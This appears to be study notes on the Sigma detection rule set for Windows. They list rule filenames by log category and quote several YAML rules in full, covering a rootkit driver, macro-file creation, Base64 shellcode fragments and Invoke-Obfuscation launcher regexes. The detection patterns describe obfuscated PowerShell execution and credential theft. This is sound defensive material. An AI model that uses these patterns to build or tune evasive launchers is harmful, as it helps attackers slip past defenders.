  12.     - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
  13. tags:
  14.     - attack.persistence
  15.     - attack.privilege_escalation
  16.     - attack.t1543.003
  17. logsource:
  18.     product: windows
  19.     category: file_event
  20. detection:
  21.     selection:
  22.         TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
  23.     condition: selection
  24. level: critical
  25. falsepositives:
  26.     - None

Dump Office Macro Files from Commandline

  1. title: Dump Office Macro Files from Commandline
  2. id: b1c50487-1967-4315-a026-6491686d860e
  3. status: experimental
  4. description: A office file with macro is created from a commandline or a script
  5. author: frack113
  6. references:
  7.     - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md
  8.     - https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
  9. date: 2022/01/23
  10. logsource:
  11.     category: file_event
  12.     product: windows
  13. detection:
  14.     selection_ext: 
  15.         TargetFilename|endswith:
  16.             - .docm
  17.             - .dotm
  18.             - .xlsm
  19.             - .xltm
  20.             - .potm 
  21.             - .pptm
  22.             - .pptx 
  23.     selection_cmd:
  24.         - Image|endswith:
  25.             - \cmd.exe
  26.             - \powershell.exe
  27.         - ParentImage|endswith:
  28.             - \cmd.exe
  29.             - \powershell.exe
  30.     condition: all of selection_*
  31. falsepositives:
  32.     - Unknown
  33. level: medium
  34. tags:
  35.     - attack.initial_access
  36.     - attack.t1566.001

image_load

image_load_abusing_azure_browser_sso.yml
image_load_alternate_powershell_hosts_moduleload.yml
image_load_foggyweb_nobelium.yml
image_load_in_memory_powershell.yml
image_load_mimikatz_inmemory_detection.yml
image_load_pcre_net_load.yml
image_load_pingback_backdoor.yml
image_load_scrcons_imageload_wmi_scripteventconsumer.yml
image_load_silenttrinity_stage_use.yml
image_load_spoolsv_dll_load.yml
image_load_susp_advapi32_dll.yml
image_load_susp_fax_dll.yml
image_load_susp_image_load.yml
image_load_susp_office_dotnet_assembly_dll_load.yml
image_load_susp_office_dotnet_clr_dll_load.yml
image_load_susp_office_dotnet_gac_dll_load.yml
image_load_susp_office_dsparse_dll_load.yml
image_load_susp_office_kerberos_dll_load.yml
image_load_susp_python_image_load.yml
image_load_susp_script_dotnet_clr_dll_load.yml
image_load_susp_system_drawing_load.yml
image_load_susp_winword_vbadll_load.yml
image_load_susp_winword_wmidll_load.yml
image_load_suspicious_dbghelp_dbgcore_load.yml
image_load_suspicious_vss_ps_load.yml
image_load_svchost_dll_search_order_hijack.yml
image_load_tttracer_mod_load.yml
image_load_uac_bypass_via_dism.yml
image_load_uipromptforcreds_dlls.yml
image_load_unsigned_image_loaded_into_lsass.yml
image_load_usp_svchost_clfsw32.yml
image_load_wmi_module_load.yml
image_load_wmi_persistence_commandline_event_consumer.yml
image_load_wmic_remote_xsl_scripting_dlls.yml
image_load_wmiprvse_wbemcomn_dll_hijack.yml
image_load_wsman_provider_image_load.yml

network_connection

net_connection_win_binary_github_com.yml
net_connection_win_binary_susp_com.yml
net_connection_win_crypto_mining.yml
net_connection_win_dllhost_net_connections.yml
net_connection_win_excel_outbound_network_connection.yml
net_connection_win_imewdbld.yml
net_connection_win_malware_backconnect_ports.yml
net_connection_win_mega_nz.yml
net_connection_win_msiexec.yml
net_connection_win_notepad_network_connection.yml
net_connection_win_powershell_network_connection.yml
net_connection_win_python.yml
net_connection_win_rdp_reverse_tunnel.yml
net_connection_win_regsvr32_network_activity.yml
net_connection_win_remote_powershell_session_network.yml
net_connection_win_rundll32_net_connections.yml
net_connection_win_silenttrinity_stager_msbuild_activity.yml
net_connection_win_susp_outbound_smtp_connections.yml
net_connection_win_susp_prog_location_network_connection.yml
net_connection_win_susp_rdp.yml
net_connection_win_suspicious_outbound_kerberos_connection.yml
net_connection_win_wuauclt_network_connection.yml

pipe_created

pipe_created_alternate_powershell_hosts_pipe.yml
pipe_created_apt_turla_namedpipes.yml
pipe_created_cred_dump_tools_named_pipes.yml
pipe_created_efspotato_namedpipe.yml
pipe_created_mal_cobaltstrike.yml
pipe_created_mal_cobaltstrike_re.yml
pipe_created_mal_namedpipes.yml
pipe_created_powershell_execution_pipe.yml
pipe_created_psexec_pipes_artifacts.yml
pipe_created_susp_adfs_namedpipe_connection.yml
pipe_created_susp_cobaltstrike_pipe_patterns.yml
pipe_created_susp_wmi_consumer_namedpipe.yml
pipe_created_tool_psexec.yml

powershell

powershell_classic

posh_pc_alternate_powershell_hosts.yml
posh_pc_delete_volume_shadow_copies.yml
posh_pc_downgrade_attack.yml
posh_pc_exe_calling_ps.yml
posh_pc_powercat.yml
posh_pc_remote_powershell_session.yml
posh_pc_renamed_powershell.yml
posh_pc_susp_athremotefxvgpudisablementcommand.yml
posh_pc_susp_get_nettcpconnection.yml
posh_pc_susp_zip_compress.yml
posh_pc_suspicious_download.yml
posh_pc_tamper_with_windows_defender.yml
posh_pc_wsman_com_provider_no_powershell.yml
posh_pc_xor_commandline.yml

powershell_module

posh_pm_alternate_powershell_hosts.yml
posh_pm_bad_opsec_artifacts.yml
posh_pm_clear_powershell_history.yml
posh_pm_decompress_commands.yml
posh_pm_get_clipboard.yml
posh_pm_invoke_obfuscation_clip.yml
posh_pm_invoke_obfuscation_obfuscated_iex.yml
posh_pm_invoke_obfuscation_stdin.yml
posh_pm_invoke_obfuscation_var.yml
posh_pm_invoke_obfuscation_via_compress.yml
posh_pm_invoke_obfuscation_via_rundll.yml
posh_pm_invoke_obfuscation_via_stdin.yml
posh_pm_invoke_obfuscation_via_use_clip.yml
posh_pm_invoke_obfuscation_via_use_mhsta.yml
posh_pm_invoke_obfuscation_via_use_rundll32.yml
posh_pm_invoke_obfuscation_via_var.yml
posh_pm_powercat.yml
posh_pm_remote_powershell_session.yml
posh_pm_susp_athremotefxvgpudisablementcommand.yml
posh_pm_susp_get_nettcpconnection.yml
posh_pm_susp_zip_compress.yml
posh_pm_suspicious_ad_group_reco.yml
posh_pm_suspicious_download.yml
posh_pm_suspicious_invocation_generic.yml
posh_pm_suspicious_invocation_specific.yml
posh_pm_suspicious_local_group_reco.yml
posh_pm_suspicious_reset_computermachinepassword.yml
posh_pm_suspicious_smb_share_reco.yml
posh_pm_syncappvpublishingserver_exe.yml

powershell_script

posh_ps_access_to_browser_login_data.yml
posh_ps_access_to_chrome_login_data.yml
posh_ps_accessing_win_api.yml
posh_ps_adrecon_execution.yml
posh_ps_automated_collection.yml
posh_ps_azurehound_commands.yml
posh_ps_capture_screenshots.yml
posh_ps_cl_invocation_lolscript.yml
posh_ps_cl_invocation_lolscript_count.yml
posh_ps_cl_mutexverifiers_lolscript.yml
posh_ps_cl_mutexverifiers_lolscript_count.yml
posh_ps_clear_powershell_history.yml
posh_ps_clearing_windows_console_history.yml
posh_ps_cmdlet_scheduled_task.yml
posh_ps_copy_item_system32.yml
posh_ps_cor_profiler.yml
posh_ps_create_local_user.yml
posh_ps_create_volume_shadow_copy.yml
posh_ps_data_compressed.yml
posh_ps_detect_vm_env.yml
posh_ps_directorysearcher.yml
posh_ps_directoryservices_accountmanagement.yml
posh_ps_dnscat_execution.yml
posh_ps_dump_password_windows_credential_manager.yml
posh_ps_enable_psremoting.yml
posh_ps_enumerate_password_windows_credential_manager.yml
posh_ps_file_and_directory_discovery.yml
posh_ps_get_acl_service.yml
posh_ps_get_adreplaccount.yml
posh_ps_get_childitem_bookmarks.yml
posh_ps_icmp_exfiltration.yml
posh_ps_invoke_command_remote.yml
posh_ps_invoke_dnsexfiltration.yml
posh_ps_invoke_nightmare.yml
posh_ps_keylogging.yml
posh_ps_localuser.yml
posh_ps_malicious_commandlets.yml
posh_ps_malicious_keywords.yml
posh_ps_memorydump_getstoragediagnosticinfo.yml
posh_ps_msxml_com.yml
posh_ps_nishang_malicious_commandlets.yml
posh_ps_ntfs_ads_access.yml
posh_ps_office_comobject_registerxll.yml
posh_ps_powerview_malicious_commandlets.yml
posh_ps_prompt_credentials.yml
posh_ps_psattack.yml
posh_ps_remote_session_creation.yml
posh_ps_remove_item_path.yml
posh_ps_request_kerberos_ticket.yml
posh_ps_root_certificate_installed.yml
posh_ps_run_from_mount_diskimage.yml
posh_ps_security_software_discovery.yml
posh_ps_send_mailmessage.yml
posh_ps_set_policies_to_unsecure_level.yml
posh_ps_shellintel_malicious_commandlets.yml
posh_ps_software_discovery.yml
posh_ps_store_file_in_alternate_data_stream.yml
posh_ps_susp_invoke_webrequest_useragent.yml
posh_ps_susp_remove_adgroupmember.yml
posh_ps_susp_ssl_keyword.yml
posh_ps_susp_wallpaper.yml
posh_ps_susp_win32_shadowcopy.yml
posh_ps_susp_zip_compress.yml
posh_ps_suspicious_ad_group_reco.yml
posh_ps_suspicious_download.yml
posh_ps_suspicious_execute_batch_script.yml
posh_ps_suspicious_export_pfxcertificate.yml
posh_ps_suspicious_extracting.yml
posh_ps_suspicious_getprocess_lsass.yml
posh_ps_suspicious_gwmi.yml
posh_ps_suspicious_invocation_generic.yml
posh_ps_suspicious_invocation_specific.yml
posh_ps_suspicious_iofilestream.yml
posh_ps_suspicious_keywords.yml
posh_ps_suspicious_local_group_reco.yml
posh_ps_suspicious_mail_acces.yml
posh_ps_suspicious_mount_diskimage.yml
posh_ps_suspicious_mounted_share_deletion.yml
posh_ps_suspicious_networkcredential.yml
posh_ps_suspicious_new_psdrive.yml
posh_ps_suspicious_recon.yml
posh_ps_suspicious_smb_share_reco.yml
posh_ps_suspicious_start_process.yml
posh_ps_suspicious_unblock_file.yml
posh_ps_suspicious_win32_pnpentity.yml
posh_ps_suspicious_windowstyle.yml
posh_ps_syncappvpublishingserver_exe.yml
posh_ps_tamper_defender.yml
posh_ps_test_netconnection.yml
posh_ps_timestomp.yml
posh_ps_trigger_profiles.yml
posh_ps_upload.yml
posh_ps_web_request.yml
posh_ps_windows_firewall_profile_disabled.yml
posh_ps_winlogon_helper_dll.yml
posh_ps_wmi_persistence.yml
posh_ps_wmimplant.yml
posh_ps_xml_iex.yml

PowerShell ShellCode Base64ed
  • AAAAYInlM
  • OiCAAAAYInlM
  • OiJAAAAYInlM

image.png
原始数据是啥呀?&input=QUFBQVlJbmxNCk9pQ0FBQUFZSW5sTQpPaUpBQUFBWUlubE0)

  1. title: PowerShell ShellCode
  2. id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
  3. status: experimental
  4. description: Detects Base64 encoded Shellcode
  5. references:
  6.     - https://twitter.com/cyb3rops/status/1063072865992523776
  7. tags:
  8.     - attack.defense_evasion
  9.     - attack.privilege_escalation
  10.     - attack.t1055
  11.     - attack.execution
  12.     - attack.t1059.001
  13. author: David Ledbetter (shellcode), Florian Roth (rule)
  14. date: 2018/11/17
  15. modified: 2021/10/16
  16. logsource:
  17.     product: windows
  18.     category: ps_script
  19.     definition: Script block logging must be enabled
  20. detection:
  21.     selection:
  22.         ScriptBlockText|contains: 'AAAAYInlM'
  23.     selection2:
  24.         ScriptBlockText|contains:
  25.             - 'OiCAAAAYInlM'
  26.             - 'OiJAAAAYInlM'
  27.     condition: selection and selection2
  28. falsepositives:
  29.     - Unknown
  30. level: critical

Obfuscation

Invoke-Obfuscation CLIP+Launcher
  1. title: Invoke-Obfuscation CLIP+ Launcher
  2. id: 73e67340-0d25-11eb-adc1-0242ac120002
  3. description: Detects Obfuscated use of Clip.exe to execute PowerShell
  4. status: experimental
  5. author: Jonathan Cheong, oscd.community
  6. date: 2020/10/13
  7. modified: 2021/10/16
  8. references:
  9.      - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

Invoke-Obfuscation Obfuscated IEXInvocation
  1. title: Invoke-Obfuscation Obfuscated IEX Invocation
  2. id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7
  3. description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
  4. references:
  5.   - https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888
  6. status: experimental
  7. author: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'
  8. date: 2019/11/08
  9. modified: 2022/01/27
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_iex:
  21.         - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
  22.         - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
  23.         - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
  24.         - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
  25.         - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name'
  26.         - ScriptBlockText|re: '\$VerbosePreference\.ToString\('
  27.     condition: selection_iex
  28. falsepositives:
  29.     - Unknown
  30. level: high

Invoke-Obfuscation STDIN+Launcher
  1. title: Invoke-Obfuscation STDIN+Launcher
  2. id: 779c8c12-0eb1-11eb-adc1-0242ac120002
  3. description: Detects Obfuscated use of stdin to execute PowerShell
  4. status: experimental
  5. author: Jonathan Cheong, oscd.community
  6. date: 2020/10/15
  7. modified: 2021/10/16
  8. references:
  9.      - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

Invoke-Obfuscation VAR+ Launcher
  2. title: Invoke-Obfuscation VAR+ Launcher
  3. id: 0adfbc14-0ed1-11eb-adc1-0242ac120002
  4. description: Detects Obfuscated use of Environment Variables to execute PowerShell
  5. status: experimental
  6. author: Jonathan Cheong, oscd.community
  7. date: 2020/10/15
  8. modified: 2021/10/16
  9. references:
  10.      - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24)
  11. tags:
  12.     - attack.defense_evasion
  13.     - attack.t1027
  14.     - attack.execution
  15.     - attack.t1059.001
  16. logsource:
  17.     product: windows
  18.     category: ps_script
  19.     definition: Script block logging must be enabled
  20. detection:
  21.     selection_4104:
  22.         ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
  23.     condition: selection_4104
  24. falsepositives:
  25.     - Unknown
  26. level: high

Invoke-Obfuscation COMPRESS OBFUSCATION
  1. title: Invoke-Obfuscation COMPRESS OBFUSCATION
  2. id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07
  3. description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  4. status: experimental
  5. author: Timur Zinniatullin, oscd.community
  6. date: 2020/10/18
  7. modified: 2021/10/16
  8. references:
  9.     - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - unknown
  25. level: medium

Invoke-Obfuscation RUNDLL LAUNCHER
  1. title: Invoke-Obfuscation RUNDLL LAUNCHER
  2. id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0
  3. description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  4. status: experimental
  5. author: Timur Zinniatullin, oscd.community
  6. date: 2020/10/18
  7. modified: 2021/10/16
  8. references:
  9.     - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: medium

Invoke-Obfuscation Via Stdin
  1. title: Invoke-Obfuscation Via Stdin
  2. id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7
  3. description: Detects Obfuscated Powershell via Stdin in Scripts
  4. status: experimental
  5. author: Nikita Nazarov, oscd.community
  6. date: 2020/10/12
  7. modified: 2021/10/16
  8. references:
  9.      - https://github.com/Neo23x0/sigma/issues/1009 #(Task28)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

Invoke-Obfuscation Via Use Clip
  1. title: Invoke-Obfuscation Via Use Clip
  2. id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0
  3. description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  4. status: experimental
  5. author: Nikita Nazarov, oscd.community
  6. date: 2020/10/09
  7. modified: 2021/10/16
  8. references:
  9.      - https://github.com/Neo23x0/sigma/issues/1009 #(Task29)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

Invoke-Obfuscation Via Use MSHTA
  2. title: Invoke-Obfuscation Via Use MSHTA
  3. id: e55a5195-4724-480e-a77e-3ebe64bd3759
  4. description: Detects Obfuscated Powershell via use MSHTA in Scripts
  5. status: experimental
  6. author: Nikita Nazarov, oscd.community
  7. date: 2020/10/08
  8. modified: 2021/10/16
  9. references:
  10.     - https://github.com/Neo23x0/sigma/issues/1009 #(Task31)
  11. tags:
  12.     - attack.defense_evasion
  13.     - attack.t1027
  14.     - attack.execution
  15.     - attack.t1059.001
  16. logsource:
  17.     product: windows
  18.     category: ps_script
  19.     definition: Script block logging must be enabled
  20. detection:
  21.     selection_4104:
  22.         ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"'
  23.     condition: selection_4104
  24. falsepositives:
  25.     - Unknown
  26. level: high

Invoke-Obfuscation Via Use Rundll32
  1. title: Invoke-Obfuscation Via Use Rundll32
  2. id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b
  3. description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  4. status: experimental
  5. author: Nikita Nazarov, oscd.community
  6. date: 2019/10/08
  7. modified: 2021/10/16
  8. references:
  9.     - https://github.com/Neo23x0/sigma/issues/1009
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"'
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  1. title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  2. id: e54f5149-6ba3-49cf-b153-070d24679126
  3. description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  4. status: experimental
  5. author: Timur Zinniatullin, oscd.community
  6. date: 2020/10/13
  7. modified: 2021/10/16
  8. references:
  9.     - https://github.com/Neo23x0/sigma/issues/1009 #(Task27)
  10. tags:
  11.     - attack.defense_evasion
  12.     - attack.t1027
  13.     - attack.execution
  14.     - attack.t1059.001
  15. logsource:
  16.     product: windows
  17.     category: ps_script
  18.     definition: Script block logging must be enabled
  19. detection:
  20.     selection_4104:
  21.         ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
  22.     condition: selection_4104
  23. falsepositives:
  24.     - Unknown
  25. level: high

process_access

proc_access_win_cmstp_execution_by_access.yml
proc_access_win_cobaltstrike_bof_injection_pattern.yml
proc_access_win_cred_dump_lsass_access.yml
proc_access_win_direct_syscall_ntopenprocess.yml
proc_access_win_in_memory_assembly_execution.yml
proc_access_win_invoke_phantom.yml
proc_access_win_lazagne_cred_dump_lsass_access.yml
proc_access_win_littlecorporal_generated_maldoc.yml
proc_access_win_load_undocumented_autoelevated_com_interface.yml
proc_access_win_lsass_dump_comsvcs_dll.yml
proc_access_win_lsass_memdump.yml
proc_access_win_lsass_memdump_evasion.yml
proc_access_win_lsass_memdump_indicators.yml
proc_access_win_malware_verclsid_shellcode.yml
proc_access_win_mimikatz_trough_winrm.yml
proc_access_win_pypykatz_cred_dump_lsass_access.yml
proc_access_win_susp_proc_access_lsass.yml
proc_access_win_susp_proc_access_lsass_susp_source.yml
proc_access_win_svchost_cred_dump.yml
proc_access_win_uac_bypass_wow64_logger.yml

process_creation

proc_creation_win_abusing_debug_privilege.yml
proc_creation_win_abusing_windows_telemetry_for_persistence.yml
proc_creation_win_accesschk_usage_after_priv_escalation.yml
proc_creation_win_ad_find_discovery.yml
proc_creation_win_advanced_ip_scanner.yml
proc_creation_win_advanced_port_scanner.yml
proc_creation_win_alternate_data_streams.yml
proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml
proc_creation_win_always_install_elevated_windows_installer.yml
proc_creation_win_anydesk.yml
proc_creation_win_anydesk_silent_install.yml
proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml
proc_creation_win_attrib_hiding_files.yml
proc_creation_win_attrib_system.yml
proc_creation_win_automated_collection.yml
proc_creation_win_bad_opsec_sacrificial_processes.yml
proc_creation_win_base64_listing_shadowcopy.yml
proc_creation_win_base64_reflective_assembly_load.yml
proc_creation_win_bitsadmin_download.yml
proc_creation_win_bootconf_mod.yml
proc_creation_win_bypass_squiblytwo.yml
proc_creation_win_c3_load_by_rundll32.yml
proc_creation_win_certoc_execution.yml
proc_creation_win_change_default_file_association.yml
proc_creation_win_cl_invocation_lolscript.yml
proc_creation_win_cl_mutexverifiers_lolscript.yml
proc_creation_win_class_exec_xwizard.yml
proc_creation_win_cleanwipe.yml
proc_creation_win_clip.yml
proc_creation_win_cmd_delete.yml
proc_creation_win_cmd_dosfuscation.yml
proc_creation_win_cmd_redirect.yml
proc_creation_win_cmdkey_recon.yml
proc_creation_win_cmstp_com_object_access.yml
proc_creation_win_cmstp_execution_by_creation.yml
proc_creation_win_cobaltstrike_load_by_rundll32.yml
proc_creation_win_cobaltstrike_process_patterns.yml
proc_creation_win_commandline_path_traversal.yml
proc_creation_win_commandline_path_traversal_evasion.yml
proc_creation_win_conti_cmd_ransomware.yml
proc_creation_win_control_panel_item.yml
proc_creation_win_copying_sensitive_files_with_credential_data.yml
proc_creation_win_coti_sqlcmd.yml
proc_creation_win_creation_mavinject_dll.yml
proc_creation_win_credential_access_via_password_filter.yml
proc_creation_win_crime_fireball.yml
proc_creation_win_crime_maze_ransomware.yml
proc_creation_win_crime_snatch_ransomware.yml
proc_creation_win_crypto_mining_monero.yml
proc_creation_win_cve_2021_26857_msexchange.yml
proc_creation_win_data_compressed_with_rar.yml
proc_creation_win_delete_systemstatebackup.yml
proc_creation_win_detecting_fake_instances_of_hxtsr.yml
proc_creation_win_dinjector.yml
proc_creation_win_discover_private_keys.yml
proc_creation_win_dll_sideload_xwizard.yml
proc_creation_win_dns_exfiltration_tools_execution.yml
proc_creation_win_dns_serverlevelplugindll.yml
proc_creation_win_dnscat2_powershell_implementation.yml
proc_creation_win_dotnet.yml
proc_creation_win_dsim_remove.yml
proc_creation_win_dumpstack_log_evasion.yml
proc_creation_win_embed_exe_lnk.yml
proc_creation_win_encoded_frombase64string.yml
proc_creation_win_encoded_iex.yml
proc_creation_win_enumeration_for_credentials_in_registry.yml
proc_creation_win_esentutl_webcache.yml
proc_creation_win_etw_modification_cmdline.yml
proc_creation_win_etw_trace_evasion.yml
proc_creation_win_evil_winrm.yml
proc_creation_win_exfiltration_and_tunneling_tools_execution.yml
proc_creation_win_expand_cabinet_files.yml
proc_creation_win_exploit_cve_2015_1641.yml
proc_creation_win_exploit_cve_2017_0261.yml
proc_creation_win_exploit_cve_2017_11882.yml
proc_creation_win_exploit_cve_2017_8759.yml
proc_creation_win_exploit_cve_2019_1378.yml
proc_creation_win_exploit_cve_2019_1388.yml
proc_creation_win_exploit_cve_2020_10189.yml
proc_creation_win_exploit_cve_2020_1048.yml
proc_creation_win_exploit_cve_2020_1350.yml
proc_creation_win_exploit_lpe_cve_2021_41379.yml
proc_creation_win_exploit_systemnightmare.yml
proc_creation_win_false_sysinternalsuite.yml
proc_creation_win_file_permission_modifications.yml
proc_creation_win_findstr_gpp_passwords.yml
proc_creation_win_fsutil_symlinkevaluation.yml
proc_creation_win_gotoopener.yml
proc_creation_win_grabbing_sensitive_hives_via_reg.yml
proc_creation_win_hack_adcspwn.yml
proc_creation_win_hack_bloodhound.yml
proc_creation_win_hack_dumpert.yml
proc_creation_win_hack_hydra.yml
proc_creation_win_hack_koadic.yml
proc_creation_win_hack_rubeus.yml
proc_creation_win_hack_secutyxploded.yml
proc_creation_win_hack_wce.yml
proc_creation_win_hashcat.yml
proc_creation_win_headless_browser_file_download.yml
proc_creation_win_hh_chm.yml
proc_creation_win_hiding_malware_in_fonts_folder.yml
proc_creation_win_high_integrity_sdclt.yml
proc_creation_win_hktl_createminidump.yml
proc_creation_win_hktl_uacme_uac_bypass.yml
proc_creation_win_html_help_spawn.yml
proc_creation_win_hwp_exploits.yml
proc_creation_win_iis_http_logging.yml
proc_creation_win_impacket_compiled_tools.yml
proc_creation_win_impacket_lateralization.yml
proc_creation_win_indirect_cmd.yml
proc_creation_win_indirect_cmd_compatibility_assistant.yml
proc_creation_win_infdefaultinstall.yml
proc_creation_win_install_reg_debugger_backdoor.yml
proc_creation_win_interactive_at.yml
proc_creation_win_invoke_obfuscation_clip.yml
proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml
proc_creation_win_invoke_obfuscation_stdin.yml
proc_creation_win_invoke_obfuscation_var.yml
proc_creation_win_invoke_obfuscation_via_compress.yml
proc_creation_win_invoke_obfuscation_via_rundll.yml
proc_creation_win_invoke_obfuscation_via_stdin.yml
proc_creation_win_invoke_obfuscation_via_use_clip.yml
proc_creation_win_invoke_obfuscation_via_use_mhsta.yml
proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
proc_creation_win_invoke_obfuscation_via_var.yml
proc_creation_win_lethalhta.yml
proc_creation_win_lobas_aspnet_compiler.yml
proc_creation_win_lobas_bash.yml
proc_creation_win_local_system_owner_account_discovery.yml
proc_creation_win_logmein.yml
proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml
proc_creation_win_lolbas_configsecuritypolicy.yml
proc_creation_win_lolbas_data_exfiltration_by_using_datasvcutil.yml
proc_creation_win_lolbas_diantz_ads.yml
proc_creation_win_lolbas_diantz_remote_cab.yml
proc_creation_win_lolbas_execution_of_wuauclt.yml
proc_creation_win_lolbas_extexport.yml
proc_creation_win_lolbas_extrac32.yml
proc_creation_win_lolbas_extrac32_ads.yml
proc_creation_win_lolbin_cscript_gathernetworkinfo.yml
proc_creation_win_lolbin_execution_via_winget.yml
proc_creation_win_lolbin_wlrmdr.yml
proc_creation_win_lolbins_by_office_applications.yml
proc_creation_win_lolbins_suspicious_driver_installed_by_pnputil.yml
proc_creation_win_lolbins_with_wmiprvse_parent_process.yml
proc_creation_win_long_powershell_commandline.yml
proc_creation_win_lsass_dump.yml
proc_creation_win_mailboxexport_share.yml
proc_creation_win_mal_adwind.yml
proc_creation_win_mal_blue_mockingbird.yml
proc_creation_win_mal_darkside_ransomware.yml
proc_creation_win_mal_hermetic_wiper_activity.yml
proc_creation_win_mal_lockergoga_ransomware.yml
proc_creation_win_mal_ryuk.yml
proc_creation_win_malware_conti.yml
proc_creation_win_malware_conti_7zip.yml
proc_creation_win_malware_conti_shadowcopy.yml
proc_creation_win_malware_dridex.yml
proc_creation_win_malware_dtrack.yml
proc_creation_win_malware_emotet.yml
proc_creation_win_malware_formbook.yml
proc_creation_win_malware_notpetya.yml
proc_creation_win_malware_qbot.yml
proc_creation_win_malware_ryuk.yml
proc_creation_win_malware_script_dropper.yml
